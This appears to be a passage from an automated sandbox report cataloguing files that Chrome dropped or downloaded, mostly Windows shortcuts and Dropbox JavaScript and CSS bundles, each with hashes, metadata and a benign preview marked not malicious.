                                                    Preview:L..................F.@.. ...$+.,......d........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.I,Y.r....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V,Y.r....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.V,Y.r....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.V,Y.r...........................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V,Y.r.....#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............u.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 09:23:19 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                    Category:dropped
                                                    Size (bytes):2691
                                                    Entropy (8bit):4.000120231775025
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:8442F5FEF76675CA33761A047E322C25
                                                    SHA1:13BC8595ED7375117158A56A480E2A9A73948AD9
                                                    SHA-256:2A3474C0E357D8ABC71D5B1079E6C847F829AB169475E9C24DADA0B87195B4E4
                                                    SHA-512:D3ABE346EB419AE3957D78DE91B9EB312B77A49C78798224D626FBB941DF53DE71048EFD2D5D3950AD786D22E6087239E93E1905EC69440AEC088992D9AC168B
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:L..................F.@.. ...$+.,....?.4 ?.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.I,Y.r....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V,Y.r....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.V,Y.r....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.V,Y.r...........................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VFW.R.....#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............u.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Sep 12 13:16:43 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                    Category:dropped
                                                    Size (bytes):2679
                                                    Entropy (8bit):3.988299312555087
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:636F33FB70D7E5979E17414E40BE4D59
                                                    SHA1:E9D50ED4EC17E8BFA1D3FC1D9CBEC7D29E5ABEF5
                                                    SHA-256:BC84C335E0EFCECD710A0E183D383AAEA79B59AC72B75B556C78A42E3A49FA9A
                                                    SHA-512:C8499050F93092B4151D4768731FE38C3DA9B7744B7D4A3CD40A77008697F6C59A8A66439DEA5512F3AF1AB58516DDBA21E918AD73B7B5839BB3093B9969C900
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:L..................F.@.. ...$+.,....J..d........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.I,Y.r....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V,Y.r....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.V,Y.r....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.V,Y.r...........................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V,Y.r.....#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............u.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Sep 12 13:16:43 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                    Category:dropped
                                                    Size (bytes):2679
                                                    Entropy (8bit):3.9740242463031628
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:F162940C52DC9FF959C12A2672925BF0
                                                    SHA1:3E407EC214FA3BFE4367D497F3099EAA6C9DEB12
                                                    SHA-256:BD52AD814A76B45B9E01DD1BD225A66C3006B7EF78B1BF76042FDF8114D8C185
                                                    SHA-512:CA28E15CF274A8C8E6B89CB7A3760C402063A744935BAFEADA99DD182836C6B92C4E936A6A5F4406BB17133647DB3E038D0435E74B0BF4BF250FEA6DA19D1595
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:L..................F.@.. ...$+.,....q..d........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.I,Y.r....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V,Y.r....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.V,Y.r....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.V,Y.r...........................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V,Y.r.....#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............u.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Sep 12 13:16:43 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                    Category:dropped
                                                    Size (bytes):2681
                                                    Entropy (8bit):3.987919018591497
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:87F04F9DFAD8CEA948D397F3B6FD0891
                                                    SHA1:9E37C9D56BDD2A6D04466254F5D9CF913101EF37
                                                    SHA-256:107E5A0CAE1AF5157E36051B0DF68BB7FC125B9484763B9BE7BFF02A8C0B0FFD
                                                    SHA-512:6FF9B7733074C3EBB90CE8D86A08CFC5B58A668B7EBABD1AC240CFBC902A26AE17FAC9A979A82F69AE39B3CACF55079CC9D22A12FB8EC7510A3C7A829548DE82
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:L..................F.@.. ...$+.,.......d........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.I,Y.r....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V,Y.r....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.V,Y.r....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.V,Y.r...........................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V,Y.r.....#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............u.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1498)
                                                    Category:downloaded
                                                    Size (bytes):1598
                                                    Entropy (8bit):4.996722154757335
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:8A979B049BFCE101C7BDB6484F0AEC42
                                                    SHA1:1D0B40DDC0AEBAC0BB09F74078C9EC22C9C64448
                                                    SHA-256:C4104549B1B99A46B1D520C22E4BC31A478DE95749B9E9869D3F75FC7710B658
                                                    SHA-512:C5775B0D5A842151FABAD9EB5348AD82E7B98614BF6102D0ED8E959669008E7AEE32E0D9517A47A763630FB1AAD898E5C7F264D805BE814FCDF682CCB56618A9
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_integrations_hellosign_deep_integration_util.after-display-vflipebBJ.js
                                                    Preview:define(["exports","./c_photo-editor_plugin_show-edit-plugin","./c_pap-events_docsend_view_docsend_hub_entry_button","./c_ts_utils","./e_core_exception","./c_lodash","./e_file_viewer_static_scl_page_folder","react","./c_core_i18n","./c_src_sink_index","metaserver/static/js/langpack","./e_edison","./c_api_v2_routes_folders_info_provider","./e_data_modules_stormcrow","./c_core_notify","react-dom","./c_performance_metrics_route_name_resolver","./c_integrations_hellosign_deep_integration_constants","metaserver/static/js/modules/constants/viewer","./c_pap-events_sign_save_signature_doc"],(function(e,t,i,r,n,o,d,s,_,a,c,l,u,p,g,f,m,E,y,P){"use strict";Object.defineProperty(e,"EntryPointSurface",{enumerable:!0,get:function(){return t.EntryPointSurface}}),Object.defineProperty(e,"EntryPointType",{enumerable:!0,get:function(){return t.EntryPointType}}),Object.defineProperty(e,"SignEditorType",{enumerable:!0,get:function(){return t.SignEditorType}}),e.getDeepLinkSource=t.getDeepLinkSource,e.getEd
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (15475)
                                                    Category:downloaded
                                                    Size (bytes):15476
                                                    Entropy (8bit):5.0679817782896786
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:112C83A5D408898FBB2F805582CD5ACC
                                                    SHA1:6C6AD637C7929057AFE68A949F6BF7EFE71453A7
                                                    SHA-256:5B18E91A23AA2F9554DBEE6E967E54CC3A20A8B8494EE23DD7E6268A43445B68
                                                    SHA-512:4782A3D007B085C9531EC49B0C96FD15DED7F72D542A63F6294202F70C9A9A0823B35B830E92302FE19C4543B7FAD489297A774737D015C5105630836D47FF4B
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/metaserver/static/css/maestro_layout-vflESyDpd.css
                                                    Preview:@font-face{font-family:'Atlas Grotesk Web';font-display:swap;src:url("/static/metaserver/static/fonts/paper-atlasgrotesk/AtlasGrotesk-Regular-Web-vflk7bxjs.woff2") format("woff2"),url("/static/metaserver/static/fonts/paper-atlasgrotesk/AtlasGrotesk-Regular-Web-vflyEJFZg.woff") format("woff"),url("/static/metaserver/static/fonts/paper-atlasgrotesk/AtlasGrotesk-Regular-Web-vflJ3txfq.ttf") format("truetype");font-weight:400;font-style:normal}@font-face{font-family:'Atlas Grotesk Web';font-display:swap;src:url("/static/metaserver/static/fonts/paper-atlasgrotesk/AtlasGrotesk-Medium-Web-vfl38XiTL.woff2") format("woff2"),url("/static/metaserver/static/fonts/paper-atlasgrotesk/AtlasGrotesk-Medium-Web-vflyja8tN.woff") format("woff"),url("/static/metaserver/static/fonts/paper-atlasgrotesk/AtlasGrotesk-Medium-Web-vflbI0jjP.ttf") format("truetype");font-weight:500;font-style:normal}@font-face{font-family:'Atlas Grotesk Web';font-display:swap;src:url("/static/metaserver/static/fonts/paper-atlasgrot
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1032)
                                                    Category:dropped
                                                    Size (bytes):1116
                                                    Entropy (8bit):5.022033344827668
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:5ADAFA0043D411230252609D9424F88D
                                                    SHA1:37319F2117E854EDC35A0FA1FB4DC9B85682977A
                                                    SHA-256:50AA9FF80D2007E5BF9BDD6D40BDE394A34839FC2D59D827A9FBB8AFE73998FD
                                                    SHA-512:3B763E51A9350E80A11DB0FA04118CD7BD99E46B820E232181B927D00E4348CE6B8919B942B662BA64BD05DDC9BD63D3C793B576BA0B9B7826FC72D159285F57
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","react","./e_file_viewer_static_scl_page_folder","./c_file_viewer_action_plugins_titlebar_button2","./c_core_i18n"],(function(e,t,a,l,n){"use strict";function i(e){return e&&e.__esModule?e:{default:e}}var o=i(t);const s=({badgeType:e,showBadge:t,label:i,action:s,icon:d,disabled:r={disabled:!1},expanded:c,dataTooltip:u=""})=>{const f=n.useIntl(),p=f.formatMessage(i),_={onClick:s,disabled:r.disabled,tabIndex:0,"aria-label":p,"aria-expanded":c},b=o.default.createElement("span",{className:l.buttonContainer},o.default.createElement(a.IconButton,{variant:"borderless",size:"large",..._,className:l.iconButton},d),t&&o.default.createElement(a.Badge,{variant:e,className:l.notificationButtonDot}));let m=null;return m=r.disabled&&r.tooltipMessage?{title:f.formatMessage(r.tooltipMessage)}:{title:p},m?o.default.createElement(a.Tooltip,{maxWidth:320,...m},o.default.createElement("span",{"data-tooltip":u},b)):o.default.createElement("span",{"data-tooltip":u},b)};s.displayName="Titleb
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:HTML document, ASCII text, with very long lines (611)
                                                    Category:downloaded
                                                    Size (bytes):27150
                                                    Entropy (8bit):4.357340680151037
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:46DD133EE00DC1BAE5E4EEBA7B88432F
                                                    SHA1:8AF86A4AC91CE48C062216FB94A6E1D57618A19B
                                                    SHA-256:9EB52EE46C7AB5EA4CA0982415DA99FDED1B7D7354F75E50847BDAE6CB44EB66
                                                    SHA-512:CB49F9E3812E2C262AF374E79BD8905CB508A45BF2C2D6AF62EED85AF43770872486A55E9425882FEDA9FB3A57A317A3C18BE1E286ADAF0C76BE7F1B0DFA8474
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://pub-03a94b366f924d73997765875d0e6b81.r2.dev/favicon.ico
                                                    Preview:<!DOCTYPE html>.<html lang="en">. <head>. <meta charset="UTF-8" />. <meta name="viewport" content="width=device-width, initial-scale=1.0" />. <link rel="icon" href="https://www.cloudflare.com/favicon.ico" />. <title>Not Found</title>. <style>. body {. font-family: system-ui;. font-weight: 300;. font-size: 1.25rem;. color: #36393a;. display: flex;. align-items: center;. justify-content: center;. }. main {. max-width: 1200px;. margin-top: 120px;. display: flex;. flex-wrap: wrap;. align-items: center;. justify-content: center;. }. #text {. max-width: 60%;. margin-left: 1rem;. margin-right: 1rem;. }. main > section > div {. margin-bottom: 3.25rem;. }. svg {. margin-left: 2rem;. }. @keyframes eye-1 {. 0% {. transform: translateX(0);. }. 10%,. 50% {. tr
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (2768)
                                                    Category:downloaded
                                                    Size (bytes):2848
                                                    Entropy (8bit):5.198921362790077
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:AABBFCCB6A05BA1DB47A2D1A1EA1D684
                                                    SHA1:4858E7B5A1A59FF5065DEFDAE0C1B65194AE59C1
                                                    SHA-256:92920EE6271F765D6435B6D391DC21A02DEF1C0C29ECF817F80D7C782E622F48
                                                    SHA-512:13137B0065579AF957297D15E6FA5EFC8E59CE9B53E40F8A4857A34A964798BCEC935A79B5CA14666E03D4E8C8277A8B264DA09900E1ADE8C8AAC85842B30FED
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_dig-icons_assets_ui-icon_line_zoom-out-vflqrv8y2.js
                                                    Preview:define(["exports","react"],(function(e,t){"use strict";function l(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(l){if("default"!==l){var n=Object.getOwnPropertyDescriptor(e,l);Object.defineProperty(t,l,n.get?n:{enumerable:!0,get:function(){return e[l]}})}})),t.default=e,Object.freeze(t)}var n=l(t);e.ThumbsDownLine=e=>n.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},n.createElement("path",{d:"m18.988 11.416-.821-4.463A2.257 2.257 0 0 0 15.937 5H10.34c-.505 0-1.002.118-1.454.343L5 7.287V14h2.058c.317 0 .628.087.9.25l1.373.825a.745.745 0 0 1 .342.46l.992 3.965h1.09a3.249 3.249 0 0 0 3.2-3.832L14.65 14h2.1a2.26 2.26 0 0 0 2.238-2.584Zm-1.66.822a.768.768 0 0 1-.578.262h-3.9l.626 3.437A1.75 1.75 0 0 1 11.835 18l-.707-2.828a2.235 2.235 0 0 0-1.025-1.383l-1.373-.824a3.25 3.25 0 0 0-1.673-.465H6.5V8.213l3.057-1.528c.244-.122.512-.185.784-.185h5.596a.763.763 0 0 1 .75.688l.82 4.462a.733.733 0 0 1-.18.587Z",fill:"currentColor",vect
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (2077)
                                                    Category:downloaded
                                                    Size (bytes):2179
                                                    Entropy (8bit):5.193336757828221
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:4284BE628FBAE660FFAA08BE28C6D9A4
                                                    SHA1:1F3C69638C9EBCD290233C3EAAE3E3DAEABB04CD
                                                    SHA-256:DAE9082E3FEDCDDED9B956357CC5CB261A00344A0F713FF87ACCDFBD162D1EFF
                                                    SHA-512:DD425D9A38398AACA1D64983849C897A66C4132EB88960DE6BA3A6DF2A966B1E666667A8E29CF2D423BAC6FA831C43C1E0BA423BA870E87A18953A9A37C88889
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_components_login-modal_login_or_register_modal.after-display-vflQoS-Yo.js
                                                    Preview:define(["require","exports","react","./e_file_viewer_static_scl_page_folder","./c_core_i18n","./e_core_exception","./c_lodash","./c_src_sink_index","./c_pap-events_docsend_view_docsend_hub_entry_button","./c_ts_utils","metaserver/static/js/langpack","./e_edison","./c_api_v2_routes_folders_info_provider","./e_data_modules_stormcrow","./c_core_notify","react-dom","./c_performance_metrics_route_name_resolver","./c_integrations_hellosign_deep_integration_constants","metaserver/static/js/modules/constants/viewer"],(function(e,n,o,t,i,r,s,l,_,a,c,g,d,u,p,m,f,h,E){"use strict";function v(e){return e&&e.__esModule?e:{default:e}}var S=v(o);const T=()=>{t.Modal$1.close()};n.closeLoginOrRegisterModal=T,n.openLoginOrRegisterModal=async({signupTag:n,folderShareToken:o,linkUrl:i,origin:r,encryptionOptions:s,loginContinuationUrl:l,mode:_,kind:a,folder:c,implicitTOSVariant:g,onAuthenticateSuccess:d,webSignInTag:u,onSignUpSuccess:p,postUpsellRedirectUrl:m,customFooterContent:f,onCancel:h=(()=>{}),isFol
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1956)
                                                    Category:dropped
                                                    Size (bytes):2033
                                                    Entropy (8bit):5.16414738259621
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:10383484E3AC898AAB07BBC3446C85B1
                                                    SHA1:7A04DF02451B37C6D185325F0F44600BCADFA019
                                                    SHA-256:4AB537DAB458B3A4A84135BD7ACFAF2A8EF309BB4BAD7BA253516B866583A6B8
                                                    SHA-512:2FC7C40CAE5A58837113293607DD84D50DB6E21E72E8F86FBD309CFF582AFA94F4A7F8B4B287F9C461E070B9972D3412059BB32789D08C79FD300BC776238664
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["require","exports","react","./c_core_utils_browser_detection","./e_file_viewer_static_scl_page_folder","./c_core_i18n","./e_core_exception","./c_lodash","./c_src_sink_index","./c_pap-events_docsend_view_docsend_hub_entry_button","./c_ts_utils","metaserver/static/js/langpack","./e_edison","./c_api_v2_routes_folders_info_provider","./e_data_modules_stormcrow","./c_core_notify","react-dom","./c_performance_metrics_route_name_resolver","./c_integrations_hellosign_deep_integration_constants","metaserver/static/js/modules/constants/viewer"],(function(e,r,t,a,o,i,n,s,_,l,u,c,d,f,p,w,v,m,S,h){"use strict";function P(e){return e&&e.__esModule?e:{default:e}}var T=P(t);const y=T.default.lazy((async()=>{const{PreviewTour:r}=await new Promise((function(r,t){e(["./c_file_viewer_preview_tour_tour"],r,t)}));return{default:r}})),N=e=>T.default.createElement(T.default.Suspense,{fallback:null},T.default.createElement(y,{...e}));N.displayName="AsyncPreviewTour";const k=T.default.lazy((async()=>{c
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (12962)
                                                    Category:dropped
                                                    Size (bytes):13022
                                                    Entropy (8bit):5.343742333863146
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:2B7B6BDA325E63D8A75F87F51CDF27BA
                                                    SHA1:19117083530E25909AD3F9C3E2305461D62094CE
                                                    SHA-256:53D087C437AF432ACA07B66C1A689C759C984D7B25B66BC43D4074A2266219BE
                                                    SHA-512:62DD06FCCC0115D918E246DBDE9A089C2E7D661EF263788E24969F10C5459A58A9EC54D921700A05DD922C8B09ED3AFBF536176A8C8E5ED8C13565D31CD2B538
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["require","exports","./e_file_viewer_static_scl_page_folder","./c_tagging_utils","./c_api_v2_routes_folders_info_provider","./e_core_exception","./c_core_i18n","./c_lodash","./c_sync_everything_redux_store"],(function(e,t,r,n,o,a,s,i,c){"use strict";const u="browse_right_rail_collapsed_preferences",l="browse_right_sidebar_preferences";function d(e){var t;try{return null===(t=r.UserLocalStorage.get(e,u))||void 0===t||t}catch(e){return a.reportException({err:e,severity:"non-critical"}),!0}}var T;function E(e){return function(e){var t;try{return null!==(t=r.UserLocalStorage.get(e,l))&&void 0!==t?t:void 0}catch(e){return void a.reportException({err:e,severity:"non-critical"})}}(e)}function _(e,t){const{unsortedFiles:n}=t.payload;return{...e,unsortedFiles:function(e){const t=new Set;let n=r.immutableExports.Map();return e.forEach(((e,r)=>{const o=e.file_id&&""!==e.file_id.trim()?e.file_id:r;t.has(o)||(t.add(o),n=n.set(r,e))})),n}(n)}}function S(a=n.defaultBrowseState,s){switch(s.typ
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text
                                                    Category:downloaded
                                                    Size (bytes):106
                                                    Entropy (8bit):4.671678894464906
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:0F743B21686079274C833BFD9CF8E0A1
                                                    SHA1:938370F8F27985AAAA0F16C58745A0E1836D70DF
                                                    SHA-256:B24641124259C5F35FD75D9363D5C17173CE82207F8AD3EBF1B270C9A40EB68E
                                                    SHA-512:3EE8D3ABF93F4E18F3B83461BA6942453044D664BAC0ADD8E7A1571B57D18FB161EDFE3B2568DC91708399F4A296BA79F6F23EA747068414E24D0CD9FB5C8926
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/metaserver/static/css/abuse/report_flag-vflD3Q7IW.css
                                                    Preview:.report-flag{position:fixed;bottom:7px;left:10px;z-index:999}.report-flag.preview-type-excel{bottom:25px}.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (2299)
                                                    Category:downloaded
                                                    Size (bytes):2379
                                                    Entropy (8bit):5.221085838369335
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:D2725F88A90E7081FA016CE91733C87C
                                                    SHA1:F5A6253B8A366DA6382331EAA1877639941659CC
                                                    SHA-256:8822BB803DE7F27C9116906FDECC5B7A97CD41AF6B01173CBD17A1D0AAE7ECBE
                                                    SHA-512:3E653AAF95BF09AC92A9F2A89A88E8FC1C47035368E13BC5E796496562F7BE88F10A40358AFDC21C8299277104E1E204DAE62C6C1CEEDE1BD2D147003F44E938
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_dig-icons_assets_ui-icon_line_settings-vfl0nJfiK.js
                                                    Preview:define(["exports","react"],(function(e,t){"use strict";function l(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(l){if("default"!==l){var r=Object.getOwnPropertyDescriptor(e,l);Object.defineProperty(t,l,r.get?r:{enumerable:!0,get:function(){return e[l]}})}})),t.default=e,Object.freeze(t)}var r=l(t);e.QrCodeLine=e=>r.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},r.createElement("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M13 5v6h6V5h-6Zm4.5 1.5h-3v3h3v-3ZM5 13v6h6v-6H5Zm4.5 1.5h-3v3h3v-3ZM5 5h6v6H5V5Zm1.5 1.5h3v3h-3v-3Z",fill:"currentColor",vectorEffect:"non-scaling-stroke"}),r.createElement("path",{d:"M13 13h1.5v1.5H13V13Z",fill:"currentColor",vectorEffect:"non-scaling-stroke"}),r.createElement("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M16 14.5h-1.5V16H13v1.5h1.5V19H16v-1.5h1.5V19H19v-1.5h-1.5V16H19v-1.5h-1.5V13H16v1.5Zm0 1.5h-1.5v1.5H16V16Zm0 0v-1.5h1.5V16H16Z",fill:"currentColor",vectorEffect:"non-scaling-s
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:C source, ASCII text, with very long lines (1680)
                                                    Category:dropped
                                                    Size (bytes):1686
                                                    Entropy (8bit):5.229933684169919
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:16E6E1F3DE7D955C6B4A28FCD6A51B45
                                                    SHA1:091FF7B6B7E00D6EE6805B220C660685CBFC9A34
                                                    SHA-256:E0F91561DC63E40C1AA9C50C3C17E4E9042DB9ECCC87B18940FBA6DB17671B9B
                                                    SHA-512:1ED7AAB8D9BC126A6DFF17D8389F80DDD863D92EB9645DC26D9AA44E710358FDF8530E1D8EF75DC0E5C8E7A5F1D4225D93B8E19FD5451121E6133027B2220802
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:(() => {const define = dbxPithosConfig._define, require = dbxPithosConfig._require; define((()=>(()=>{"use strict";var e={r:e=>{"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})}},t={};e.r(t);class n{constructor(e){this.dropboxOrigin=e}isDropboxDomain(e){const t=document.createElement("a");return t.href=e,t.hostname.endsWith(".dropbox.com")}handleEvent(e,t,n){"function"==typeof e&&e(t,n)}addQueryParameter(e,t){return 0!==t.indexOf("?")&&0!==t.indexOf("&")||(t=t.substring(1)),null===e&&(e=""),-1!==e.indexOf("?")?e+="&"+t:e+="?"+t,e}makeRequest(e,t,n,i,o,r,d,a,s){if(!e)return;e=this.dropboxOrigin+e,n||(n=6e4),i=i||function(){},o=o||function(){},r=r||function(){},d=d||function(){},s=void 0!==s?s:"POST";const u=new XMLHttpRequest;u.addEventListener("load",function(){200===u.status?this.handleEvent(i,u,a):this.handleEvent(o,u,a)}.bind(this)),u.addEventListener("error",function(){this.
